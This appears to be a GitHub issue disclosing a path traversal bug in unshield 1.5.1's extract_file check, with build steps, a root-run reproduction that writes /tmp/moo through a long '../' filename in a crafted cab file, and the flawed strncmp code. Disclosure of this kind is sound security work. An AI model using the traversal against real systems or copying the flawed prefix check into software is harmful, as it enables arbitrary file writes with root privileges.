Path traversal bug in src/unshield.c

[eqawasm]

Impact:

The latest version 1.5.1 has a path traversal vulnerability with root permission that allows the attacker to create or write to files outside the current directory due to improper string comparisons between real paths.

How to reproduce:

$ wget https://github.com/twogood/unshield/archive/refs/tags/1.5.1.tar.gz
$ tar -xzf unshield-1.5.1.tar.gz
$ cd unshield-1.5.1
$ cmake .
$ make
$ make install
# download cab and hdr files from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776193 
# must be located together in the same directory  
$ cd /
$ sudo mkdir tm
$ cd tm
$ ls /tmp/moo
  ls: cannot access /tmp/moo: No such file or directory

$ sudo /home/path/to/unshield-1.5.1/src/unshield x /path/to/data1.cab
     Cabinet: data1.cab
       extracting: ./Bovine_Files/../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../tmp/moo
     --------  -------
          1 files

# verify attack worked
$ ls /tmp/moo
  /tmp/moo

Root cause:

unshield/src/unshield.c

Lines 494 to 506 in 67bca73

	realpath(output_directory, real_output_directory);
	realpath(filename, real_filename);
	if (real_filename == NULL || strncmp(real_filename,
	real_output_directory,
	strlen(real_output_directory)) != 0)
	{
	fprintf(stderr, "\n\nExtraction failed.\n");
	fprintf(stderr, "Error: %s (%d).\n", strerror(errno), errno);
	fprintf(stderr, "Possible directory traversal attack for: %s\n", filename);
	fprintf(stderr, "To be placed at: %s\n\n", real_filename);
	success = false;
	goto exit;
	}

The root cause is the return true value of function strncmp in src/unshield.c that passes if condition in function extract_file

PoC image:

download data1.cab and data1.hdr from https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=776193

[twogood]

Thanks! PR is welcome!